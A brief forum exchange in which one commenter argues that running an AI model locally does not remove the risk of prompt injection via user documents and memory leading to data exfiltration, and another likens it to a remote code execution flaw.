|
|
|
|
|
|
by loocorez
631 days ago
|
|
|
I don’t think running it locally solves this issue at all (though I agree with the sentiment of your comment). If the local AI will follow instructions stored in user’s documents and has similar memory persistence it doesn’t matter if it’s hosted in the cloud or run locally, prompt injection + data exfiltration is still a threat that needs to be mitigated. If anything at least the cloud provider has some incentive/resources to detect an issue like this (not saying they do, but they could). |
|
|
it is no different from remote code execution vuln, except instead of code, it's instructions.